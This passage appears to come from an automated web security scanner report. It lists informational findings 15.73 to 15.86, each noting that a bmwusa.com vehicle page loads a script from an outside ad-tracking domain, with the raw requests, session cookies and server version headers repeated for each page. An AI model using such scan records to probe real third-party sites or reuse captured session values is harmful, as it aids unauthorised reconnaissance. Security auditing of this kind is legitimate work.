Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:13 GMT;path=/
Content-Length: 215034


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.73. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:11 GMT;path=/
Content-Length: 226530


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.74. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:29 GMT;path=/
Content-Length: 217613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.75. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:35 GMT;path=/
Content-Length: 202177


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.76. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:16:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:36:14 GMT;path=/
Content-Length: 202178


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.77. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335dsedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335dsedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:19 GMT;path=/
Content-Length: 214393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.78. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:17:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:37:18 GMT;path=/
Content-Length: 225963


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.79. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:59 GMT;path=/
Content-Length: 214580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.80. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:31:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:51:11 GMT;path=/
Content-Length: 202520


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.81. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iconvertible/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:30:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:50:32 GMT;path=/
Content-Length: 214891


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.82. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:32:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:52:06 GMT;path=/
Content-Length: 201005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.83. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:31:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:51:05 GMT;path=/
Content-Length: 216544


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.84. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:37 GMT;path=/
Content-Length: 202158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.85. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335icoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:48 GMT;path=/
Content-Length: 214704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.86. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
